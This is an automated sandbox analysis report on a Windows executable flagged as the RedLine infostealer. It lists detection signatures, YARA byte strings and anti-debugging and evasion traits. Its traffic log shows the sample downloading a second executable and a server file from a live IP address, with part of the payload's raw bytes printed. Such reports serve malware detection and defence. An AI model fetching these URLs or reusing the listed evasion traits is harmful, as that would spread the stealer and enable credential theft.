Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BaGkRDSifo.exe

Overview

General Information

Sample name:BaGkRDSifo.exe
renamed because original name is a hash value
Original sample name:3b8f605388479cd9296e0be1ea9d1f60.exe
Analysis ID:1448043
MD5:3b8f605388479cd9296e0be1ea9d1f60
SHA1:4608fd9d55cae50eaa9379b02373afea15572eae
SHA256:d550397a71e1fc77be3460d1742f1df63d43ba74487a10ec96befc1c768768bc
Tags:32exeRedLineStealer
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BaGkRDSifo.exe (PID: 180 cmdline: "C:\Users\user\Desktop\BaGkRDSifo.exe" MD5: 3B8F605388479CD9296E0BE1EA9D1F60)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
BaGkRDSifo.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 A3 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\STHealthUpdate.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 1A 88 44 24 2B 88 44 24 2F B0 49 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
SourceRuleDescriptionAuthorStrings
00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      SourceRuleDescriptionAuthorStrings
      0.0.BaGkRDSifo.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 A3 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.
      0.2.BaGkRDSifo.exe.6580000.6.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        0.2.BaGkRDSifo.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 A3 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          0.3.BaGkRDSifo.exe.5734f52.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: BaGkRDSifo.exeVirustotal: Detection: 28%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\Desktop\STHealthUpdate.exeJoe Sandbox ML: detected
            Source: BaGkRDSifo.exeJoe Sandbox ML: detected
            Source: BaGkRDSifo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: STHealthClient.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbt source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: STHealthClient.pdbx]D source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 9876
            Source: unknownNetwork traffic detected: HTTP traffic on port 9876 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 9876
            Source: unknownNetwork traffic detected: HTTP traffic on port 9876 -> 49701
            Source: Yara matchFile source: 0.2.BaGkRDSifo.exe.6580000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BaGkRDSifo.exe.5b80f32.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BaGkRDSifo.exe.5b80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BaGkRDSifo.exe.45fff90.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: global trafficTCP traffic: 192.168.2.7:49701 -> 47.104.173.216:9876
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 27 May 2024 11:10:41 GMTAccept-Ranges: bytesETag: "f599508326b0da1:0"Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 27 May 2024 13:23:01 GMTContent-Length: 243200Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 10 84 2d 2c 71 ea 7e 2c 71 ea 7e 2c 71 ea 7e 32 23 7f 7e 3f 71 ea 7e 0b b7 91 7e 2b 71 ea 7e 2c 71 eb 7e 5c 71 ea 7e 32 23 6e 7e 1c 71 ea 7e 32 23 69 7e a2 71 ea 7e 32 23 7b 7e 2d 71 ea 7e 52 69 63 68 2c 71 ea 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 69 54 66 00 00 00 00 50 45 00 00 4c 01 04 00 74 a5 00 50 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 98 01 00 00 1a 02 00 00 00 00 00 2f cd 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 fb 3b 02 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 15 02 00 50 00 00 00 00 60 02 00 8c 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b1 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0d 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 97 01 00 00 10 00 00 00 98 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b4 6d 00 00 00 b0 01 00 00 6e 00 00 00 9c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 30 00 00 00 20 02 00 00 16 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8c 95 01 00 00 60 02 00 00 96 01 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Host: 47.104.173.216:9876Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /STHealthUpdate.exe HTTP/1.1Host: 47.104.173.216:9876
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: unknownTCP traffic detected without corresponding DNS query: 47.104.173.216
            Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Host: 47.104.173.216:9876Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /STHealthUpdate.exe HTTP/1.1Host: 47.104.173.216:9876
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://11.65.9.11:9082/jkda/webservice/DPService
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://11.65.9.11:9082/jkda/webservice/DPService#
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.104.173.216:
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.104.173.216:9876
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.104.173.216:9876/STHealthUpdate.exe
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.104.173.216:9876/server.txt
            Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://com.wondersgroup.jkda.application.modules.webservice
            Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://com.wondersgroup.jkda.application.modules.webserviceT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://com.wondersgroup.jkda.application.modules.webserviceTU
            Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/$
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/AppliyUpLoadT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/AppliyUpLoad_BoErChengT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ChangestatusT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CheckUpLoadReportFromBytesT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownLoadReportFormIDT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownLoadReportFormPDFByAccountPassWordT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownLoadReportForm_PKIT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadBarCodeCancelT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadBarCodeFlagT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DownloadBarCodeT
